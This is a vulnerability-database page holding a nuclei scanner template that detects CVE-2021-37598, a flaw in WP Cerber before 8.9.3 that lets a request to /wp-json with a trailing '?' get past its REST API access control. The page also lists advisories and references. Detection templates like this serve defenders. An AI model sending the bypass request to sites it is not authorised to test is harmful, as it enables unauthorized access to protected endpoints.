Lucene search
K

WP Cerber < 8.9.3 - Broken Access Control

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

WP Cerber below 8.9.3 bypasses REST API access with a trailing '?', enabling unauthorized access; update to 8.9.3 or later.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-37598
19 Aug 202119:15
attackerkb
Circl
CVE-2021-37598
19 Aug 202122:18
circl
CNNVD
WordPress WP Cerber 安全漏洞
19 Aug 202100:00
cnnvd
CVE
CVE-2021-37598
19 Aug 202118:48
cve
Cvelist
CVE-2021-37598
19 Aug 202118:48
cvelist
EUVD
EUVD-2021-24156
7 Oct 202500:30
euvd
NVD
CVE-2021-37598
19 Aug 202119:15
nvd
OSV
CVE-2021-37598
19 Aug 202119:15
osv
Prion
Authentication flaw
19 Aug 202119:15
prion
Positive Technologies
PT-2021-21730
19 Aug 202100:00
ptsecurity
Rows per page
id: CVE-2021-37598

info:
  name: WP Cerber < 8.9.3 - Broken Access Control
  author: theamanrawat
  severity: medium
  description: |
    WP Cerber < 8.9.3 contains a bypass of /wp-json access control caused by improper handling of trailing '?' character, letting unauthorized users access protected REST API endpoints, exploit requires sending a request with a trailing '?'.
  impact: |
    Unauthorized users can access protected REST API endpoints, potentially leading to information disclosure or further exploitation.
  remediation: |
    Update to version 8.9.3 or later.
  reference:
    - https://github.com/mandiant/Vulnerability-Disclosures/blob/master/FEYE-2021-0024/FEYE-2021-0024.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37598
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-37598
    epss-score: 0.0235
    epss-percentile: 0.81641
    cwe-id: CWE-863
  metadata:
    verified: false
    max-request: 3
    vendor: wp-cerber
    product: wp-cerber
  tags: cve,cve2021,wordpress,wp-cerber,access-control,rest-api,exposure,auth-bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json"

    matchers:
      - type: status
        status:
          - 403
          - 404
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-json?"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":'
          - '"url":'
          - '"home":'
          - '"description":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402206fc38dac7aa7816f616bf5bd656cbdf76aaf07b06d7766428650b9b02ab163c402201a464115d7d6ffcb22bcc8aa8cb7a1884702d4aedb3004049ec39535129032ac:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 25
CVSS 3.15.3
EPSS0.0235
26